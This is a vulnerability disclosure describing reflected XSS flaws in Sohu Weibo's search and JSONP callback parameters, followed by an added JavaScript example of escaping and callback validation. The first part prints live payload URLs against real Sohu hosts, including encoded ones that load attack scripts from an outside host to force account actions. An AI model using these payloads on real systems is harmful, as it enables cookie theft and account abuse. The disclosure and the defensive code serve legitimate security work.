1. The first is a reflected XSS
http://t.sohu.com/twsearch/twSearch?key=asd&"><script>alert(document.cookie)</script>=1
The parameter handling here is flawed, which is what allows the XSS. The more involved version below goes a step further: the injected payload pulls in an external js file.
http://t.sohu.com/twsearch/twSearch?key=asdf&%22%3E%3Cimg%20src%3D%27ice%27%20onerror%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27http%3A%2f%2ficefish1987.sinaapp.com%2faddFollow.js%27%3Bdocument.body.appendChild%28s%29%3B%22%3E
http://t.sohu.com/twsearch/twSearch?key=asdf&%22%3E%3Cimg%20src%3D%27ice%27%20onerror%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27http%3A%2f%2ficefish1987.sinaapp.com%2faddFollowajax.js%27%3Bdocument.body.appendChild%28s%29%3B%22%3E
(The injected js submits in two variants, one via a form and one via ajax. Another problem here is that there is no token guarding these requests; there should be one to combat the reflected XSS.)
2. Short links on Sohu Weibo also seem to be a problem.
http://t.itc.cn/pQfAP
This is a short link I generated. Shouldn't it be filtered? If it is not filtered, it may be a risk.
3. A few more reflected XSS, all in the callback parameter:
cc.i.sohu.com/a/app/counts/get.htm?ids=blog_228544023,blog_228108828,clerk,blog_227980500,clerk,blog_227776940,blog_227758059,blog_227757241&callback=<script>alert(document.cookie)</script>
stat.i.sohu.com/guest/frag/recents.do?callback=<script>alert(document.cookie)</script>&xpt=MTgxNzEyODE0QHFxLmNvbQ%3D%3D&_=1342946198434
In addition, I would like to thank @gainover for the detailed tutorial and px1624 for the js code.
Solution:
Filter the reflected parameters.
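As an added example (written for this page, not taken from the report and not Sohu's own code), the helpers below show the two fixes the findings above call for: HTML-encoding the reflected key parameter before it is echoed into the page, and restricting the JSONP callback parameter to a plain function name so that a `<script>` tag in the callback is rejected outright instead of being written into the response. The `renderSearchBox` markup, the callback pattern and the 64-character cap are assumptions, not Sohu's actual templates or limits.

```javascript
// Added defensive example (assumed markup and limits; not the site's real code).
// Fix 1: the reflected "key" parameter is entity-encoded before it lands in HTML.
// Fix 2: the JSONP "callback" parameter must be a JS identifier path, nothing else.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode the five characters that can break out of an attribute or a text node.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumed search-box template: the value is quoted and encoded, so a payload such as
// asd&"><script>... stays inert inside the attribute.
function renderSearchBox(key) {
  return `<input type="text" name="key" value="${escapeHtml(key)}">`;
}

// Accept identifier segments joined by dots (e.g. "jQuery171_1342946198434" or "app.cb"),
// which covers what JSONP clients actually send and excludes tags, quotes and parentheses.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 64 && CALLBACK_RE.test(name);
}

// Build the JSONP body. Returns null when the callback is rejected so the caller can
// answer with a 400 instead of reflecting anything.
function renderJsonp(callback, payload) {
  if (!isValidCallback(callback)) return null;
  // JSON.stringify output is valid inside a script body except for the U+2028/U+2029
  // line terminators, which are escaped here; the leading /**/ defeats Rosetta-Flash-style
  // abuse of the response as a different file type.
  const json = JSON.stringify(payload)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return `/**/ ${callback}(${json});`;
}

// Headers a JSONP endpoint should send so the browser never treats the body as HTML.
const JSONP_HEADERS = {
  'Content-Type': 'application/javascript; charset=utf-8',
  'X-Content-Type-Options': 'nosniff',
};

// Constructed inputs shaped like the payloads in the report; returns what each fix produces.
function demo() {
  const reflected = 'asd&"><script>alert(document.cookie)</script>';
  const badCallback = '<script>alert(document.cookie)</script>';
  return {
    searchBox: renderSearchBox(reflected),
    rejected: renderJsonp(badCallback, { ok: true }),
    accepted: renderJsonp('cb123', { ok: true }),
    headers: JSONP_HEADERS,
  };
}
```

`demo()` returns the encoded search box, `null` for the `<script>` callback, and `/**/ cb123({"ok":true});` for a well-formed one; wiring `JSONP_HEADERS` onto the response is what keeps a rejected or odd response from being sniffed as HTML.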